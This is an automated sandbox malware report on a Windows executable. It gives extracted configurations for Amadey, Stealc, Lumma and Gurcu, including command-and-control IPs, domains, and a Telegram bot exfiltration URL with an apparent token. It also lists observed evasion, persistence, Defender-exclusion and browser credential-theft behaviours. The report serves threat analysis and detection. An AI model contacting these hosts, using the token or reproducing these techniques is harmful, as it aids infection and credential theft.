Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03/12/2024, 01:00
Static task
static1
Behavioral task
behavioral1
Sample
1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe
Resource
win10v2004-20241007-en
General
-
Target
1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe
-
Size
1.8MB
-
MD5
08d46090c22ff00bd53e843027e0dc26
-
SHA1
ec4d86baa8a294a18daf44fcb61eca03c3116c23
-
SHA256
1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215
-
SHA512
c9d9214076bd90886b52713287c771264f2a46a76d93b42c6a208bc95e0f5d58a4d41dafe7feadf114f27c1cd430fd90c571e5a30f078c1b9459a8212224b0ed
-
SSDEEP
24576:z2BoyWmAgwI0L6ul/urTQzxYtarKUKkpOb0A93R8S9D5pbgFqAKzeleH4W+:z2OFe0L6ugiKhxs6pqqAKzCeH
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
stealc
default_valenciga
http://185.215.113.17
-
url_path
/2fb6c2cc8dce150a.php
Extracted
lumma
https://crib-endanger.sbs
https://faintbl0w.sbs
https://300snails.sbs
https://bored-light.sbs
https://3xc1aimbl0w.sbs
https://pull-trucker.sbs
https://fleez-inc.sbs
https://thicktoys.sbs
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
gurcu
https://api.telegram.org/bot8009002136:AAHPJrz2-Pn7ZXvJ8icMhaRHpwMHWNcOutY/sendDocumen
Extracted
lumma
https://drive-connect.cyou/api
Signatures
-
Amadey family
-
Gurcu family
-
Lumma family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 2628 created 3536 2628 NK4PJqi.exe 56 PID 3236 created 2652 3236 rhnew.exe 44 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rhnew.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 98b117a7c2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e4bf8a11f7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8f3dd0e015.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8f3dd0e015.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 60fb84b2fe.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cf2d2ab250.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5100 powershell.exe 4664 powershell.exe 2548 powershell.exe 2424 powershell.exe 6140 powershell.exe 4072 powershell.exe 5372 powershell.exe 5416 powershell.exe 5924 powershell.exe 5848 powershell.exe -
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2484 chrome.exe 6516 msedge.exe 6164 msedge.exe 5692 msedge.exe 5900 chrome.exe 6124 chrome.exe 1008 chrome.exe 5128 msedge.exe 5672 msedge.exe -
Checks BIOS information in registry 2 TTPs 26 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e4bf8a11f7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8f3dd0e015.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rhnew.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cf2d2ab250.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8f3dd0e015.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8f3dd0e015.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 60fb84b2fe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rhnew.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 98b117a7c2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 98b117a7c2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e4bf8a11f7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8f3dd0e015.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cf2d2ab250.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 60fb84b2fe.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation 1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation vvcWObH.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation 98b117a7c2.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation AllNew.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 25 IoCs
pid Process 3568 skotes.exe 2628 NK4PJqi.exe 5028 DU1zDwm.exe 4404 vvcWObH.exe 4420 skotes.exe 1780 MicrosoftEdgeUpdateTaskMachineCoreSC.exe 3236 rhnew.exe 5004 98b117a7c2.exe 5532 axplong.exe 6884 stealc_default2.exe 7048 e4bf8a11f7.exe 5792 alex2022.exe 5072 alex2022.exe 3284 axplong.exe 5316 skotes.exe 1828 MicrosoftEdgeUpdateTaskMachineCoreSC.exe 6376 8f3dd0e015.exe 5804 8f3dd0e015.exe 5124 AllNew.exe 6920 Gxtuum.exe 5740 f680663ba9.exe 5044 trru7rd2.exe 4980 60fb84b2fe.exe 3560 cf2d2ab250.exe 4620 ATLEQQXO.exe -
Identifies Wine through registry keys 2 TTPs 13 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine cf2d2ab250.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine 98b117a7c2.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine e4bf8a11f7.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine 8f3dd0e015.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine 60fb84b2fe.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine 1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine rhnew.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine 8f3dd0e015.exe -
Loads dropped DLL 2 IoCs
pid Process 6884 stealc_default2.exe 6884 stealc_default2.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8f3dd0e015.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011466001\\8f3dd0e015.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f680663ba9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011467001\\f680663ba9.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\60fb84b2fe.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011468001\\60fb84b2fe.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e4bf8a11f7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011465001\\e4bf8a11f7.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 api.myip.com 20 api.myip.com -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 6956 cmd.exe 2420 cmd.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0009000000023ca3-3905.dat autoit_exe -
Drops file in System32 directory 16 IoCs
description ioc Process File created C:\Windows\System32\DriverStore\FileRepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_0d06b6638bdb4763\mshdc.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_254cd5ae09de6b08\usbport.PNF dxdiag.exe File created \??\c:\windows\system32\driverstore\filerepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF dxdiag.exe File created \??\c:\windows\system32\driverstore\filerepository\hdaudbus.inf_amd64_533c8d455025cc59\hdaudbus.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_b748590104fe1c15\machine.PNF dxdiag.exe File created \??\c:\windows\system32\driverstore\filerepository\machine.inf_amd64_b748590104fe1c15\machine.PNF dxdiag.exe File created \??\c:\windows\system32\driverstore\filerepository\usbport.inf_amd64_254cd5ae09de6b08\usbport.PNF dxdiag.exe File created \??\c:\windows\system32\driverstore\filerepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF dxdiag.exe File created \??\c:\windows\system32\driverstore\filerepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF dxdiag.exe File created \??\c:\windows\system32\driverstore\filerepository\mshdc.inf_amd64_0d06b6638bdb4763\mshdc.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_adeb6424513f60a2\input.PNF dxdiag.exe File created \??\c:\windows\system32\driverstore\filerepository\input.inf_amd64_adeb6424513f60a2\input.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_533c8d455025cc59\hdaudbus.PNF dxdiag.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 1168 1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe 3568 skotes.exe 4420 skotes.exe 3236 rhnew.exe 5004 98b117a7c2.exe 5532 axplong.exe 7048 e4bf8a11f7.exe 3284 axplong.exe 5316 skotes.exe 6376 8f3dd0e015.exe 5804 8f3dd0e015.exe 4980 60fb84b2fe.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2628 set thread context of 2372 2628 NK4PJqi.exe 93 PID 1780 set thread context of 100 1780 MicrosoftEdgeUpdateTaskMachineCoreSC.exe 165 PID 5792 set thread context of 5072 5792 alex2022.exe 195 PID 1828 set thread context of 424 1828 MicrosoftEdgeUpdateTaskMachineCoreSC.exe 200 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\axplong.job 98b117a7c2.exe File created C:\Windows\Tasks\Gxtuum.job AllNew.exe File created C:\Windows\Tasks\skotes.job 1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe -
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral2/files/0x0009000000023cb2-3962.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 4180 3236 WerFault.exe 180 6540 5848 WerFault.exe 203 6816 7048 WerFault.exe 190 316 6376 WerFault.exe 201 840 5072 WerFault.exe 195 2308 5072 WerFault.exe 195 772 6856 WerFault.exe 256 -
System Location Discovery: System Language Discovery 1 TTPs 34 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e4bf8a11f7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ATLEQQXO.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8f3dd0e015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AllNew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language trru7rd2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rhnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex2022.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8f3dd0e015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NK4PJqi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex2022.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 98b117a7c2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stealc_default2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 60fb84b2fe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cf2d2ab250.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 6620 PING.EXE 4008 powershell.exe 264 powershell.exe 4436 PING.EXE 3048 powershell.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs dxdiag.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dxdiag.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dxdiag.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs dxdiag.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dxdiag.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dxdiag.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 stealc_default2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString stealc_default2.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 8 IoCs
pid Process 7008 taskkill.exe 1880 taskkill.exe 2424 taskkill.exe 1644 taskkill.exe 1412 taskkill.exe 5756 taskkill.exe 6168 taskkill.exe 6928 taskkill.exe -
Modifies registry class 36 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID\ = "DxDiag.DxDiagClassObject" dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32 dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment" dxdiag.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-493223053-2004649691-1575712786-1000\{B4B8EAA4-C27A-44D5-95AB-83E76BB2C684} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1 dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B} dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1 dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\CLSID dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\ = "DxDiagClassObject Class" dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7} dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}" dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32 dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\ = "DxDiagClassObject Class" dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}" dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class" dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CLSID dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer\ = "DxDiag.DxDiagClassObject.1" dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID\ = "DxDiag.DxDiagClassObject.1" dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\ = "DxDiagProvider Class" dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\VersionIndependentProgID dxdiag.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-493223053-2004649691-1575712786-1000\{99B98B5A-CBB6-4E46-9DC5-44236C420155} dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer\ = "DxDiag.DxDiagClassObject.1" dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove\ = "Programmable" dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\SYSTEM32\\dxdiagn.dll" dxdiag.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\ = "DxDiagProvider Class" dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID dxdiag.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\ProgID dxdiag.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 6620 PING.EXE 4436 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3608 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
